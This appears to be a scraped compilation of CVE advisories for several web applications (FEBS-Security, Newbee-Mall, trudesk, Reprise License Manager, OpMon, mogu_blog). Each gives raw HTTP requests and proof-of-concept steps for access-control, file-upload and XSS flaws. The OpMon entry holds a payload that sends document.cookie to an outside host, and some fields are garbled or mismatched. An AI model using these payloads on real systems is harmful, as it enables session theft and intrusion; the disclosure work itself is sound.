Insecure permissions configured in the userid parameter at /user/getuserprofile of FEBS-Security v1.0 allows attackers to access and arbitrarily modify users' personal information.

**There is a security vulnerability exists in FEBS-Security.**

\[Suggested description\] The user / getuserprofile method in FEBS security project lacks the verification of userid, so that any user can modify the personal information of other users through the user / updateuserprofile method. via a Google search in url:http://localhost:8080/user/updateUserProfile

\[Vulnerability Type\] Insecure permissions

\[Vendor of Product\] https://github.com/febsteam/FEBS-Security

\[Affected Product Code Base\] v1.0

\[Affected Component\] //受影响的组件 POST /web\_info/save.json HTTP/1.1 Host: localhost:9105 Content-Length: 213 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" Accept: application/json, text/javascript, _/_; q=0.01 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://localhost:9105 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:9105/web\_info/edit.action Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: JSESSIONID=955307B507B1FD2D9AE8E69C6EABFB75; navUrl=http://localhost:9105/admin/basic.action Connection: close

name=Javaex%E8%AE%BA%E5%9D%9B&domain=http%3A%2F%2Fwww.javaex.cn%2F&email=291026192%40qq.com&recordNumber=%E8%8B%8FICP%E5%A4%8718008530%E5%8F%B7&license=1&statisticalCode= your xss payload

\[Attack Type\] Remote

\[Proof of concept\]

1.There are security vulnerabilities in the personal information modification module of this project. It is known from the source code that the function of modifying personal information is to judge the user according to the incoming userid.

    @RequestMapping("user/getUserProfile")
    @ResponseBody
    public ResponseBo getUserProfile(Long userId) {
        try {
            MyUser user = new MyUser();
            user.setUserId(userId);
            return ResponseBo.ok(this.userService.findUserProfile(user));
        } catch (Exception e) {
            log.error("获取用户信息失败", e);
            return ResponseBo.error("获取用户信息失败，请联系网站管理员！");
        }
    }
    
    @RequestMapping("user/updateUserProfile")
    @ResponseBody
    public ResponseBo updateUserProfile(MyUser user) {
        try {
            this.userService.updateUserProfile(user);
            return ResponseBo.ok("更新个人信息成功！");
        } catch (Exception e) {
            log.error("更新用户信息失败", e);
            return ResponseBo.error("更新用户信息失败，请联系网站管理员！");
        }
    }
    

2.Use burpsuite to capture packets and modify userid

![image-20220215135415477](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135415477.png)

3.The userid of the currently logged in user is 171, and the modified userid is 172.Enter the modify personal information page.

![image-20220215135703895](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135703895.png)

4.After modifying any content, click save. Get packet capture data.

![image-20220215135841905](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215135841905.png)

5.After saving successfully, exit the current login user, switch to the user with userid 172 just modified, and enter the page of viewing personal information.Vulnerability recurrence completed.

![image-20220215140035912](https://github.com/afeng2016-s/CVE-Request/raw/main/febs-security/febs.assets/image-20220215140035912.png)

CVE-2022-27958: CVE-Request/febs.md at main · afeng2016-s/CVE-Request

Newbee-Mall v1.0.0 was discovered to contain an arbitrary file upload via the Upload function at /admin/goods/edit.

\[Suggested description\]  
A file upload vulnerability exists in NewBee mall. Because the upload method of uploadcontroller can bypass the upload restriction by modifying the file format suffix.

\[Vulnerability Type\]  
File upload vulnerability

\[Vendor of Product\]  
https://github.com/newbee-ltd/newbee-mall

\[Affected Product Code Base\]  
v1.0.0

\[Affected Component\]  
POST /admin/upload/file HTTP/1.1  
Host: localhost:28089  
Content-Length: 671  
Cache-Control: max-age=0  
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"  
sec-ch-ua-mobile: ?0  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost:28089/  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoXATzrr6JWhnTx5Q  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,_/_;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Dest: iframe  
Referer: http://localhost:28089/admin/goods/edit/10907  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8  
Cookie: locale=zh-cn; Hm\_lvt\_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=11D044F12F07C3F2772AC7EE836610E2  
Connection: close

\------WebKitFormBoundaryoXATzrr6JWhnTx5Q  
Content-Disposition: form-data; name="file"; filename="1.html.png"  
Content-Type: image/png

<script type="text/javascript" src="http://www.qq.com/404/search\_children.js" charset="utf-8" homePageUrl="{{domain}}" homePageName="{{siteName}}"></script>

            <script>alert("xss")</script>
        </div>
    </div>
    

\------WebKitFormBoundaryoXATzrr6JWhnTx5Q--

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
1.Access address http://localhost:28089/admin/goods , select a commodity information to modify and enter the file upload page.  
![image](https://user-images.githubusercontent.com/85676107/156484791-7cf3819d-08ae-4b5a-b6dd-c41ca09e25f1.png)  
2.Open burpsuite packet capturing agent and click to upload pictures.  
![image](https://user-images.githubusercontent.com/85676107/156484843-1ac1fefa-ee37-45dd-a800-bf6fd74d788d.png)  
3.By default, the system only supports JPG, PNG and GIF files. We can bypass them by modifying the file suffix.  
![image](https://user-images.githubusercontent.com/85676107/156484894-ec280ca5-9f84-4499-9763-e57fb297b504.png)  
4.Modify the value of filename to 1.html  
![image](https://user-images.githubusercontent.com/85676107/156484948-9d5736a9-5132-4f65-8a7b-e6f0b281c3e3.png)  
Get the access path to file upload  
![image](https://user-images.githubusercontent.com/85676107/156484999-7ae125b6-0f2c-4a1d-bb89-a0496dc26126.png)  
Complete data update  
![image](https://user-images.githubusercontent.com/85676107/156485043-07f12491-d25b-4c33-89fd-107211a2431c.png)  
5.Access the upload file path, and the vulnerability reproduction is completed.  
![image](https://user-images.githubusercontent.com/85676107/156485114-79f128cd-a0fb-4d86-8e48-5b101d3c24b8.png)

\[Defective code\]  
![image](https://user-images.githubusercontent.com/85676107/156485179-496031ed-1ff4-4d46-bd95-c8c839fde36a.png)

CVE-2022-27477: There is a File upload vulnerability exists in newbee-mall · Issue #63 · newbee-ltd/newbee-mall

A cross-site scripting (XSS) vulnerability at /admin/goods/update in Newbee-Mall v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the goodsName parameter.

\[Suggested description\]  
There is a cross site scripting vulnerability in the commodity information modification module in the main version of NewBee mall. The vulnerability stems from the fact that the form submission module that modifies the commodity information does not restrict or escape the sensitive characters entered, causing the execution of malicious JS code to trigger JS pop-up.

\[Vulnerability Type\]  
Cross site scripting vulnerability

\[Vendor of Product\]  
https://github.com/newbee-ltd/newbee-mall

\[Affected Product Code Base\]  
v1.0.0

\[Affected Component\]

    POST /admin/goods/update HTTP/1.1
    Host: localhost:28089
    Content-Length: 392
    sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
    Accept: */*
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: application/json
    Origin: http://localhost:28089
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost:28089/admin/goods/edit/10907
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
    Cookie: locale=zh-cn; Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1645520663,1645696647; JSESSIONID=5B28A8C926D035BCC4A809131899B51D
    Connection: close
    
    {"goodsId":"10907","goodsName":"鐖辩柉<script>alert(\"xss\")</script>","goodsIntro":"xxx","goodsCategoryId":"47","tag":"鐖辩柉","originalPrice":"1","sellingPrice":"1","stockNum":"0","goodsDetailContent":"<p>hhh</p><p><br/></p>","goodsCoverImg":"http://localhost:28089/upload/20220303_10153124.html","goodsCarousel":"http://localhost:28089/upload/20220303_10153124.html","goodsSellStatus":"0"}
    

\[Impact Code execution\]  
true

\[Vulnerability proof\]  
1.Access address http://localhost:28089/admin/goods , select the commodity information to be modified and enter information editing.  
![image](https://user-images.githubusercontent.com/85676107/156488864-c47eee7c-1052-44a4-af50-a2febdbf9888.png)

2.Enter <script>alert(“xss”)</script> in the input box and click Save to complete the form information submission.  
![image](https://user-images.githubusercontent.com/85676107/156488901-ae7b7b65-2326-4aa5-9365-340ac7b58c20.png)

![image](https://user-images.githubusercontent.com/85676107/156488941-164b4a54-15b1-40f7-8c1b-902e0a168479.png)

3.The pop-up window is triggered when the page is refreshed, and the loophole reproduction is completed  
![image](https://user-images.githubusercontent.com/85676107/156488974-0f39a2b7-a699-4f35-a7ee-1a25e54a693d.png)

CVE-2022-27476: There is a Cross site scripting vulnerability exists in newbee-mall · Issue #64 · newbee-ltd/newbee-mall

XSS vulnerability with default `onCellHtmlData` function in GitHub repository hhurz/tableexport.jquery.plugin prior to 1.25.0. Transmitting cookies to third-party servers. Sending data from secure sessions to third-party servers

CVE-2022-1291

Stored XSS in "Name", "Group Name" & "Title" in GitHub repository polonel/trudesk prior to v1.2.0. This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.

@@ -18,6 +18,7 @@ var winston = require('winston') var bcrypt \= require('bcrypt') var \_ \= require('lodash') var Chance \= require('chance') const utils \= require('../helpers/utils')  
// Required for linkage require('./role') @@ -89,10 +90,11 @@ userSchema.pre('findOne', autoPopulateRole).pre('find', autoPopulateRole) userSchema.pre('save', function (next) { var user \= this  
user.username \= user.username.toLowerCase().trim() user.email \= user.email.trim() if (user.fullname) user.fullname \= user.fullname.trim() if (user.title) user.title \= user.title.trim() user.username \= utils.sanitizeFieldPlainText(user.username.toLowerCase().trim()) user.email \= utils.sanitizeFieldPlainText(user.email.trim())  
if (user.fullname) user.fullname \= utils.sanitizeFieldPlainText(user.fullname.trim()) if (user.title) user.title \= utils.sanitizeFieldPlainText(user.title.trim())  
if (!user.isModified('password')) { return next()

CVE-2022-1290: chore(security): fix issue where html was allowed in some input fields · polonel/trudesk@4f48b3b

Permalink

Browse files

chore(security): fix issue where html was allowed in some input fields

*   Loading branch information

Showing with **42 additions** and **19 deletions**.

1.  +11 −1 src/helpers/utils/index.js
2.  +2 −1 src/models/attachment.js
3.  +3 −2 src/models/department.js
4.  +2 −1 src/models/group.js
5.  +3 −1 src/models/notice.js
6.  +3 −2 src/models/role.js
7.  +3 −2 src/models/tag.js
8.  +3 −2 src/models/team.js
9.  +2 −1 src/models/ticket.js
10.  +2 −1 src/models/ticketpriority.js
11.  +2 −1 src/models/tickettype.js
12.  +6 −4 src/models/user.js

Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture, and file/directory details.

    Multiple Vulnerabilities in Reprise License Manager 14.2Credit: Giulia Melotti Garibaldi//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28363# Vulnerability Title: Reflected Cross-Site Scripting# Severity: Medium# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/login_process "username" parameter via GET. No authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/login_process?username=admin<script>alert("1")</script><script>alert("1")</script>&password=admin&ok=LOGIN HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedContent-Length: 38Origin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goform/login_process/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28364# Vulnerability Title: Authenticated Reflected Cross-Site Scripting# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability (XSS) in the /goform/rlmswitchr_process "file" parameter via GET. Authentication is required.Vulnerability PoC:GET http://HOST:5054/goform/rlmswitchr_process?file=<script>alert("1")</script> HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Content-Type: application/x-www-form-urlencodedOrigin: http://HOST:5054Connection: keep-aliveReferer: http://HOST:5054/goforms/rlmswitchrCookie: REDACTED/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////# Product:  RLM 14.2# Vendor:   Reprise Software# CVE ID:   CVE-2022-28365# Vulnerability Title: Unauthenticated Information Disclosure# Severity: Low# Author(s): Giulia Melotti Garibaldi# Date:     2022-03-29##############################################################Introduction:Reprise License Manager 14.2 is affected by an Information Disclosure vulnerability via a GET request to /goforms/rlminfo. No authentication is required.The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information.Vulnerability PoC:GET http://HOST:5054/goforms/rlminfo HTTP/1.1Host: HOST:5054User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-aliveContent-Length: 0//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

CVE-2022-28365: Reprise License Manager 14.2 Cross Site Scripting

A Cross Site Scripting (XSS) vulnerability exists in OpServices OpMon through 9.11 via the search parameter in the request URL.

    # Exploit Title: Opmon 9.11 - Cross-site Scripting# Date: 2021-06-01# Exploit Author: p3tryx# Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time# Version: 9.11# Tested on: Chrome, IE and Firefox# CVE : CVE-2021-43009# URL POC:<script>alert(document.cookie);var i=new Image;i.src="http://192.168.0.18:8888/?"+document.cookie;</script>Url-encoded Payload%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E```*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>[search]=%27};PAYLOAD&x=0&y=0*https://192.168.1.100/opmon/seagull/www/index.php/opinterface/action/redirect/initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/filter*<https://opmon/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/opinterface/action/redirect/?initial_page=/opmon/seagull/www/index.php/statusgrid/action/hosts/?filter>[search]=%27};%3Cscript%3E%0Aalert%28document.cookie%29%3B%0Avar%20i%3Dnew%20Image%3B%0Ai.src%3D%22http%3A%2F%2F192.168.0.18%3A8888%2F%3F%22%2Bdocument.cookie%3B%0A%3C%2Fscript%3E&x=0&y=0```

CVE-2021-43009: Opmon 9.11 Cross Site Scripting ≈ Packet Storm

mogu_blog_cms 5.2 suffers from upload arbitrary files without any limitation.

1.Black box pentesting

Using mogu2021:mogu2021 to log in the mogu\_blog\_v5.2 backend Management System.

![image](https://user-images.githubusercontent.com/96566383/157186244-d3e77ff9-2dac-420c-bce7-b6f1ea903a8e.png)

Find the Blog Management - Blog Management - Local-file Upload feature .  
![image](https://user-images.githubusercontent.com/96566383/157186279-c44f2b18-29cc-4512-9ca7-87d2b58dcb7a.png)

Click this blue button to select a local image for uploading, and then click the green button to put the image to server side  
![image](https://user-images.githubusercontent.com/96566383/157186295-6c7d33fc-7ddb-4505-bb82-70cf9547b4a5.png)

At this point, use the burp suite to capture the request packet.  
![image](https://user-images.githubusercontent.com/96566383/157186319-807ba3a1-6115-4f3e-aa1b-1264bdcfeb38.png)

and then forward it to the Repeater module.

Try to send a request to upload a normal image and you can see that the image was uploaded successfully.

And the response packet returns the address information of the image.  
![image](https://user-images.githubusercontent.com/96566383/157186355-5fefa9e9-b1e7-4633-abfe-0a6eca6ee687.png)

Splice the address in the response packet with the url to try to access the image we just uploaded .

The whole url :  
http://23.224.61.136:8600//blog/admin/png/2022/3/8/1646708813850.png

You can see the successful access to the uploaded image.  
![image](https://user-images.githubusercontent.com/96566383/157186387-b708e87f-7b0f-4717-8ad2-413b9b944232.png)

Back in the burp suite, try changing the contents of the file in the request package to xss payload，as well as trying to change the file name to an html suffix.  
![image](https://user-images.githubusercontent.com/96566383/157186414-816ad458-60ad-41ba-a65b-994467e411e1.png)

You can see the successful upload and the file path in the response package.

Splice the file path to the url and open a new browser (without admin cookies/session/token) to try to access it.

The whole url :  
http://23.224.61.136:8600///blog/admin/html/2022/3/8/1646709195222.html  
![image](https://user-images.githubusercontent.com/96566383/157186425-660b69c5-d95b-448b-ac80-f9f35d5ff2f5.png)

You can see that the xss payload was successfully executed and that there is an arbitrary file to upload.

Try again to modify the request package and found that arbitrary file uploads were possible while the feature was intended to allow only image format files to be uploaded.

jsp:  
![image](https://user-images.githubusercontent.com/96566383/157186441-85e809eb-c339-45c8-ad83-717ff9dddb71.png)

php:  
![image](https://user-images.githubusercontent.com/96566383/157186469-65648b7c-42ee-4573-b728-4ad21d9b373a.png)

cpp:  
![image](https://user-images.githubusercontent.com/96566383/157186488-b3ac1f7e-78f6-49ad-950f-eb30a0248e37.png)

2.White box pentest

Based on the url of the image upload request  
(/mogu-picture/file/pictures), we can tell that the class that handles the image upload function is located in the /mogu-picture subproject  
![image](https://user-images.githubusercontent.com/96566383/157186502-b066b777-68a6-49d0-b32c-2bc3efa262a3.png)  
![image](https://user-images.githubusercontent.com/96566383/157186516-88a8ba9e-df7e-4f2b-9dc7-84dc9d8eca38.png)

According to the request url (mogu-picture/file/pictures) continue to locate the FileRestApi.java class

mogu\_blog/mogu\_blog\_v2/mogu\_picture/src/main/java/com/moxi/mogublog/picture/restapi/FileRestApi.java  
![image](https://user-images.githubusercontent.com/96566383/157186535-50930646-5e25-478a-9dc8-445d012e27dd.png)

With @RequestMapping("/file") you can see that all requests for the /file path will be processed by this class

And requests for the /file/pictures path are handled by the uploadPics() method of this class  
![image](https://user-images.githubusercontent.com/96566383/157186551-4c4bdd9d-b3a9-4e09-91dd-65cf7aaf31f0.png)

This method first obtains the system configuration file, and this step does not perform any checks on the suffix name, format, or file content of the uploaded file

This method then calls the batchUploadFile() method of the FileServiceImpl class instance object  
![image](https://user-images.githubusercontent.com/96566383/157186616-275e42ab-9c5c-4ca3-a447-5fc37e5c6116.png)

Follow up in the batchUploadFile() method of the FileServiceImpl class to see its source code  
![image](https://user-images.githubusercontent.com/96566383/157186636-29b425ee-24fe-44b8-a020-3b222deeecd6.png)

The first part of the code is to get some files and system base information, none of which is file-checked

Continuing to follow up to the code for file uploads,

You can see that there is no strict verification of the uploaded file extension, file content, or file format  
![image](https://user-images.githubusercontent.com/96566383/157186650-1a3cba4d-e85e-4718-919d-8d16019c4107.png)

The next code execution reaches the try /catch {} block, which involves the uploadFile() method of the QiniuServiceImpl class  
![image](https://user-images.githubusercontent.com/96566383/157186664-b1181eaa-8056-4526-873b-cf1cb3d3cbb1.png)

Going deeper into this method leads to the uploadSingleFile() method.  
![image](https://user-images.githubusercontent.com/96566383/157186678-c5d3f4fb-966a-4923-bbc3-540a57ddd20c.png)

You can see that the file suffix, file format and file content are still not strictly verified.

Back in the batchUploadFile() method of the FileServiceImpl class,

After checking the code after , not only the code for uploading the QiNiu server did not have strict file verification, but also the code for uploading Minio server and the code for uploading to the local server was not strictly verified.

Finally, in the batchUploadFile() method of the FileServiceImpl class, the following code will be executed.  
![image](https://user-images.githubusercontent.com/96566383/157186701-aa19fa04-a502-4139-936e-0790957da957.png)

Set the information of the uploaded file to some settings.

Then save and upload feedback to the client response file.

The entire code execution process does not strictly check the suffix name, file format, and file content of the uploaded files.

This allows attackers to use the file upload interface to upload arbitrary files and even insert xss payloads.

Tag

#xss